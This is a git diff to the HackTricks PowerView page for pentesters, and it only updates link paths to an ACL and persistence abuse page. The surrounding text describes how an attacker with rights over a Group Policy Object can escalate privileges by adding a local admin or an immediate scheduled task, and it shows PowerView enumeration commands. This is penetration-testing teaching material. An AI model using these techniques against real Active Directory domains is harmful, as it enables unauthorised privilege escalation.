[**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** diff --git a/windows-hardening/basic-powershell-for-pentesters/powerview.md b/windows-hardening/basic-powershell-for-pentesters/powerview.md index d21934593..b0528bfbe 100644 --- a/windows-hardening/basic-powershell-for-pentesters/powerview.md +++ b/windows-hardening/basic-powershell-for-pentesters/powerview.md @@ -155,7 +155,7 @@ Get-NetRDPSession -ComputerName #List RDP sessions inside a host (n ### Group Policy Object - GPOs If an attacker has **high privileges over a GPO** he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task** (immediate) to perform an action.\ -For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse.md#gpo-delegation). +For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation). ```powershell #GPO @@ -193,8 +193,8 @@ Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectNam Learn how to **exploit permissions over GPOs and ACLs** in: -{% content-ref url="../active-directory-methodology/acl-persistence-abuse.md" %} -[acl-persistence-abuse.md](../active-directory-methodology/acl-persistence-abuse.md) +{% content-ref url="../active-directory-methodology/acl-persistence-abuse/" %} +[acl-persistence-abuse](../active-directory-methodology/acl-persistence-abuse/) {% endcontent-ref %} ### ACL